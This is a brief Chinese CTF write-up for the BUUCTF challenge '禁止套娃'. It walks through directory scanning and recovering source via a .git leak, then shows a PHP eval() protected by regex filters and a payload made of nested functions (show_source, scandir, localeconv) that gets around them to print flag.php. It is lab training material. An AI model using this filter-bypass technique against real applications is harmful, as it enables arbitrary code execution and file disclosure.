BUUCTF——禁止套娃
BUUCTF——禁止套娃
进入靶场
一个近乎空白的页面
看一下框架
没什么有用的信息,扫个目录吧
只扫出来给flag.php,但是0B,估计又是个空网站
拼接访问一下
果然又是什么都没有
没有突破口
githack找找看看也没有源码吧
<?php
include "flag.php";
echo "flag在哪里呢?<br>";
if(isset($_GET['exp'])){ //get传参expif (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {//过滤伪协议if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {//过滤关键字// echo $_GET['exp'];@eval($_GET['exp']);}else{die("还差一点哦!");}}else{die("再好好想想!");}}else{die("还想读flag,臭弟弟!");}
}
// highlight_file(__FILE__);
?>
根据这段代码构造payload
?exp=show_source(next(array_reverse(scandir(pos(localeconv())))));
拿到flag
flag{510faf28-0e0f-400d-aa4d-c88c74df6cde}
下播!
